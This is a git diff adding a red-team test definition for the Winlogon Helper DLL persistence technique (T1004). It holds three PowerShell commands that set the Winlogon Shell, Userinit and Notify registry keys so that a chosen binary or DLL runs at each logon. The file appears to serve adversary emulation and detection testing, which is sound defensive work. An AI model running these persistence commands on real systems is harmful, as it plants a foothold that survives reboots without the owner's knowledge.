diff --git a/atomics/T1004/T1004.yaml b/atomics/T1004/T1004.yaml new file mode 100644 index 00000000..63e470e1 --- /dev/null +++ b/atomics/T1004/T1004.yaml @@ -0,0 +1,59 @@ +--- +attack_technique: T1004 +display_name: Winlogon Helper DLL + +atomic_tests: +- name: Winlogon Shell Key Persistence - PowerShell + description: | + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + + supported_platforms: + - windows + + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + + executor: + name: powershell + command: | + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force + +- name: Winlogon Userinit Key Persistence - PowerShell + description: | + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + + supported_platforms: + - windows + + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + + executor: + name: powershell + command: | + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +- name: Winlogon Notify Key Logon Persistence - PowerShell + description: | + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + + supported_platforms: + - windows + + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + + executor: + name: powershell + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force